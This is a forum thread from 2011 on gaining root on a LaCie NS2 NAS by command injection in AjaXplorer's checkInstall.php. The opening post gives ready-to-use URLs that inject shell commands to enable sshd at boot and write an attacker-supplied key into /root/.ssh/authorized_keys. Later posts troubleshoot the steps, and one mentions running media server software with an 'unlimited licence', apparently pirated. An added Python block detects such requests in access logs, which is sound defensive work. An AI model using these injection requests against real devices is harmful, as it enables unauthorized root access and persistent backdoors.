Getting Root for NS2 using a vulnerability web interface.

ak97
Posts: 28
Joined: Thu Feb 03, 2011 6:52 am
Location: Moscow

Getting Root for NS2 using a vulnerability web interface.

Post by ak97 » Thu Feb 03, 2011 5:31 pm

Getting root on the NS2 without a firmware update, using the web interface vulnerability.
To start, the standard warning: whatever you do, you do at your own risk.
These instructions are suitable for all firmware that uses AjaXplorer 2.x (1.2.6-1.2.9 inclusive).
This has only been checked on firmware 1.2.9! For other firmware, the query strings may need some changes.

So, to get root access, we need a web browser and a previously prepared text file with the URL links through which we will perform the hack.

Copy the following lines in the code sections to a text file, replacing the string YOUR.NS2.IP.ADDRESS with the IP address of your NS2. Copy and change the lines carefully, otherwise the result is unpredictable.

STAGE1
To get started, register the sshd service to run at startup. To do this, make 6 queries in the browser.

1) make a backup of default.runlevel:

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||cp%20/etc/initng/runlevel/default.runlevel%20/www/browser/plugins/access.ssh/default.runlevel.txt&&echo%20%22--Host%22
2) copy the first 19 lines of default.runlevel

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||head%20-19%20/etc/initng/runlevel/default.runlevel%3Edefault.runlevel&&echo%20%22--Host%22
3) add the sshd line

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||echo%20-en%20sshd%5Cn%3E%3Edefault.runlevel&&echo%20%22--Host%22
4) copy the remaining lines of default.runlevel

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||tail%20-3%20/etc/initng/runlevel/default.runlevel%3E%3Edefault.runlevel&&echo%20%22--Host%22
5) set the +x flag

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||chmod+%2bx+default.runlevel%3Etest.txt&&echo%20%22--Host%22
6) copy the default.runlevel file to /etc/initng/runlevel

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||cp%20/www/browser/plugins/access.ssh/default.runlevel%20/etc/initng/runlevel/default.runlevel&&echo%20%22--Host%22
Make sure that everything is OK. Make a request ...
... and see the result:

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/test.txt
The result should look like this:

initial
dbus
udev
hald
clock
dhcdbd
logrotate
syslogd
klogd
swap
modules
mountfs
mountuserfs
raid
usb
hostname
NetworkManager
http
getty/1
sshd
cron
unicorn
thumbd
If you do not get this result, start all over again.

STAGE2
Now we have to prepare the RSA public key. To do this, run the following command in a terminal:

ssh-keygen -b 1024 -t rsa -N YOUR_PASSWORD -f lacie_ns2 
As a result you will have 2 files:
lacie_ns2
lacie_ns2.pub

Open the site http://www.string-functions.com/urlencode.aspx in your browser.
Enter the contents of the file lacie_ns2.pub in the upper window, and then click "Encode!".
The encoded RSA public key content appears in the lower window; it will be needed in the queries below.

STAGE3
Install the public key on the device

1) Create a folder for the key

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||mkdir%20-p%20/root/.ssh%3Etest.txt&&echo%20%22--Host%22
2) Install the public key

http://YOUR.NS2.IP.ADDRESS/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||echo%20<INSERT ENCODED RSA PUB KEY HERE>%3E/root/.ssh/authorized_keys&&echo%20%22--Host%22
Warning!
This is an example - you do not need to run it!
Your query should look like this:

http://192.168.1.100/browser/plugins/access.ssh/checkInstall.php?destServer=2%3E/dev/null||echo%20ssh-rsa+AABAB3NzaC1yc2EAAKABIwALAIEAtBDWi3rcLUXO5Fe%2b825Yp7TkL2UC98fYFtLjPKOgX7QDKL1pLrae%2fuzcSucmYtasZppxQaMU4mfdCI0ruC77ABvFZrB6upnkFs0xGJUr%2bsJY%2fU7LFvIb%2fbypcqMWTkBKhOhlrm1bvss%2fJ37%2b559Psa%2bMqvb%2bCPbbieFWzFPkgD8%3d+ak97%40MBP.local%3E/root/.ssh/authorized_keys&&echo%20%22--Host%22

Done.
Restart the device. If everything was done correctly, you can connect to the device via ssh:
ssh -i ./lacie_ns2 root@YOUR.NS2.IP.ADDRESS
and change the root password to allow connections from another machine.


P.S.
Possibly this method can be simplified, but I'm too lazy to do it - it works as it is))...
P.P.S.
Sorry for my English
Last edited by ak97 on Wed Mar 02, 2011 6:49 pm, edited 1 time in total.

ak97
Posts: 28
Joined: Thu Feb 03, 2011 6:52 am
Location: Moscow

Re: Creating a custom capsule / Hacking 1.2.6-1.2.9 NS2

Post by ak97 » Thu Feb 03, 2011 6:27 pm

Well done. After getting root access, I installed TwonkyMedia server 6.0.30 with unlimited licence. It's easy. Maybe it should be posted in another topic?

And one more thing: I am looking for the best torrent client with an upload feature to install on the NS2.

m1lkman
Posts: 11
Joined: Tue Jan 25, 2011 4:24 pm

Re: Creating a custom capsule / Hacking 1.2.6-1.2.9 NS2

Post by m1lkman » Thu Feb 03, 2011 8:59 pm

@ak97 Wow; I'm in!!!

Could you give me a quick pointer how to install twonky?

Regards,

Henk

ak97
Posts: 28
Joined: Thu Feb 03, 2011 6:52 am
Location: Moscow

Re: Creating a custom capsule / Hacking 1.2.6-1.2.9 NS2

Post by ak97 » Thu Feb 03, 2011 10:01 pm

Using the web interface vulnerability is a hack. Pay no attention to the message in the browser. You just need to execute all the commands sequentially.
m1lkman wrote: Could you give me a quick pointer how to install twonky?
Sure, but later...

m1lkman
Posts: 11
Joined: Tue Jan 25, 2011 4:24 pm

Re: Creating a custom capsule / Hacking 1.2.6-1.2.9 NS2

Post by m1lkman » Fri Feb 04, 2011 8:18 am

ak97 wrote:sure, but later...
Thx, appreciated!

jhiswin
Posts: 44
Joined: Mon Oct 18, 2010 4:16 am

Re: Getting Root for NC2 using a vulnerability web interface

Post by jhiswin » Fri Feb 04, 2011 11:02 am

Nice. Just an FYI, the Lacie techs read this forum (or did in the past) and patched the old exploit. This will likely be patched in a next update, if they make one.

cyberdog
Posts: 47
Joined: Tue Aug 24, 2010 9:20 am
Location: NANCY - FRANCE

Re: Getting Root for NC2 using a vulnerability web interface

Post by cyberdog » Fri Feb 04, 2011 11:29 am

A very big thank you to ak97 :D

But I'm always stuck on stage 3. I'm handling it fine, but my terminal asks for a password?

ak97
Posts: 28
Joined: Thu Feb 03, 2011 6:52 am
Location: Moscow

Re: Getting Root for NC2 using a vulnerability web interface

Post by ak97 » Fri Feb 04, 2011 2:13 pm

jhiswin wrote:Nice. Just an FYI, the Lacie techs read this forum (or did in the past) and patched the old exploit. This will likely be patched in a next update, if they make one.
OK. Let them patch it - I do not mind)))
I advise everyone: once you get root, delete or rename the file www/browser/plugins/access.ssh/checkInstall.php
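
Added example, not part of any post in this thread and not LaCie code: one way to spot requests like the ones in the first post in a web server access log, for anyone checking whether the script was reached before it was removed. It assumes Common Log Format lines and that a legitimate destServer value is a plain host name or IP address; the sample log lines and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path taken from the URLs in the first post (compared case-insensitively).
TARGET = "/browser/plugins/access.ssh/checkinstall.php"
# Assumption: a legitimate destServer is a host name or IP address, optional port.
HOSTLIKE = re.compile(r"^[A-Za-z0-9.\-]+(:\d{1,5})?$")
# Assumption: Common Log Format, i.e. client ... "METHOD target PROTOCOL" ...
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*"')

# Constructed sample lines (documentation addresses, harmless payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Feb/2011:10:00:00 +0000] "GET /browser/plugins/access.ssh/'
    'checkInstall.php?destServer=backup.example.net HTTP/1.1" 200 12',
    '192.0.2.44 - - [04/Feb/2011:10:02:13 +0000] "GET /browser/plugins/access.ssh/'
    'checkInstall.php?destServer=2%3E/dev/null%7C%7Ctrue HTTP/1.1" 200 7',
    '192.0.2.10 - - [04/Feb/2011:10:05:40 +0000] "GET /browser/index.php'
    '?destServer=a%7Cb HTTP/1.1" 200 512',
]


def suspicious_requests(log_lines):
    """Return (client, decoded destServer) pairs for checkInstall.php requests
    whose destServer value is not a plain host name."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.groups()
        url = urlsplit(target)
        if url.path.lower() != TARGET:
            continue
        # parse_qs percent-decodes, so %3E and %7C are checked as '>' and '|'.
        values = parse_qs(url.query, keep_blank_values=True).get("destServer", [])
        hits += [(client, v) for v in values if not HOSTLIKE.match(v)]
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-host destServer value: {value!r}")
```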

ak97
Posts: 28
Joined: Thu Feb 03, 2011 6:52 am
Location: Moscow

Re: Getting Root for NC2 using a vulnerability web interface

Post by ak97 » Fri Feb 04, 2011 2:15 pm

@cyberdog - let's read tech info about ssh (ssh-keygen, ssh, pairing keys, etc.), then you will understand the meaning of the above procedures

cyberdog
Posts: 47
Joined: Tue Aug 24, 2010 9:20 am
Location: NANCY - FRANCE

Re: Getting Root for NC2 using a vulnerability web interface

Post by cyberdog » Fri Feb 04, 2011 4:28 pm

ak97 wrote: @cyberdog - let's read tech info about ssh (ssh-keygen, ssh, pairing keys, etc.), then you will understand the meaning of the above procedures

Yes, it's true

I don't understand this

m1lkman
Posts: 11
Joined: Tue Jan 25, 2011 4:24 pm

Re: Getting Root for NC2 using a vulnerability web interface

Post by m1lkman » Fri Feb 04, 2011 9:01 pm

cyberdog wrote: A very big thank you to ak97 :D

But I'm always stuck on stage 3. I'm handling it fine, but my terminal asks for a password?
@cyberdog: I had exactly the same issue yesterday ;)

Until I realised that in Stage 2 you actually set your ssh password. If you go back and read Stage 2, you see YOUR_PASSWORD.

Well, that's the password you have to provide when the terminal asks you to...

Good luck!

cyberdog
Posts: 47
Joined: Tue Aug 24, 2010 9:20 am
Location: NANCY - FRANCE

Re: Getting Root for NC2 using a vulnerability web interface

Post by cyberdog » Sat Feb 05, 2011 9:57 am

m1lkman wrote:
cyberdog wrote: A very big thank you to ak97 :D

But I'm always stuck on stage 3. I'm handling it fine, but my terminal asks for a password?
@cyberdog: I had exactly the same issue yesterday ;)

Until I realised that in Stage 2 you actually set your ssh password. If you go back and read Stage 2, you see YOUR_PASSWORD.

Well, that's the password you have to provide when the terminal asks you to...

Good luck!
Yes, I know that,
but it doesn't work.

I'm going back to 1.02 with a hard reset this evening
and will try again.

vUksi
Posts: 1
Joined: Sat Feb 05, 2011 12:44 pm

Re: Getting Root for NC2 using a vulnerability web interface

Post by vUksi » Sat Feb 05, 2011 12:47 pm

Hi! Long time follower, first time poster blahblahblah.

Thanks a million ak97! I got everything working with your instructions. For some reason my first try left # in front of sshd but when I rebooted and tried again it worked.

minosh
Posts: 19
Joined: Sat Feb 05, 2011 8:46 pm

Re: Getting Root for NC2 using a vulnerability web interface

Post by minosh » Sat Feb 05, 2011 8:54 pm

Thank you so much ... that's so helpful.

I am also stuck in stage 3. It does not accept the password, and I recreated a new certificate to be sure of the password and it is still the same...

NB: I spent too much time before I realized that the multimedia server has to be enabled... stupid me...

One question: is it possible to make other users' folders accessible by the admin account? Would it be possible to do that if I enable SSH access?

Thanks again

cyberdog
Posts: 47
Joined: Tue Aug 24, 2010 9:20 am
Location: NANCY - FRANCE

Re: Getting Root for NC2 using a vulnerability web interface

Post by cyberdog » Sun Feb 06, 2011 4:19 pm

Very good news for me

It works!!!

One big piece of info:

Everything comes from my first tests on versions 1.02 and 1.2.5.
I had missed tests, then updated to version 1.2.9 and nothing worked!
I returned to factory settings (1.02), then updated to 1.2.9, tried again, and everything is correct.
